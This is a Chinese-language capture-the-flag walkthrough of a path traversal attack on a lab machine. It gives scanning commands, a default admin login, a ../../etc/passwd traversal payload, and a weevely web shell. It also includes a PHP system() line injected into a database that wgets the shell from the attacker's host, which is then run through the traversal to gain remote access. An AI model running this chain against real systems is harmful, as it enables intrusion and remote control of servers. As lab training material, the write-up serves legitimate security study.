【CTF】路徑遍歷實戰
阿新 • • 發佈:2022-04-10
kali:192.168.223.131
target:192.168.223.171
通過arp-scan -l
獲取目標IP為192.168.223.171,nmap掃描一下,開放22、80、111、39682埠
nmap -p- -A 192.168.223.171
看一眼網頁,是單頁部落格,使用web掃描工具nikto看看有沒有敏感資訊
nikto -h http://192.168.223.171
再開個dirb進行掃描
dirb http://192.168.223.171
掃描到一個dbadmin的檔案,裡面有test_db.php的檔案
點開是個登陸視窗,Google搜尋phpLiteAdmin預設密碼是admin登陸
再通過owasp-zap進行掃描
owasp-zap //開啟圖形化軟體
//直接輸入目標網站url,開始掃描後結果都放在Alerts欄目下
由於我是kali中文版,正常應該是Alerts,Alerts裡面越紅表示越危險,其中第一個是一個目錄遍歷的漏洞,發現裡面的/etc/passwd
192.168.223.171/view.php?page=../../../../../../../etc/passwd
利用weevely生成木馬
//密碼是123456
weevely generate 123456 /root/shell.php
利用目錄遍歷漏洞,建立一個shell.php的庫,表名是a,裡面有一個欄位b,型別是text,目的是在b欄位插入值,下載kali上儲存的木馬檔案
<?php system("cd /tmp;wget http://192.168.223.131:8000/shell.php;chmod +x shell.php;");?>
通過python開啟8000埠
python -m SimpleHTTPServer
訪問網站儲存該表的位置
192.168.223.171/view.php?page=../../../../../../../usr/databases/shell.php
此時網站將會下載檔案,注意HTTPServer開啟的位置下需要有木馬檔案,否則路徑錯誤
此時獲取檔案儲存位置後連線即可
weevely http://192.168.223.171/view.php?page=../../../../../../../tmp/shell.php 123456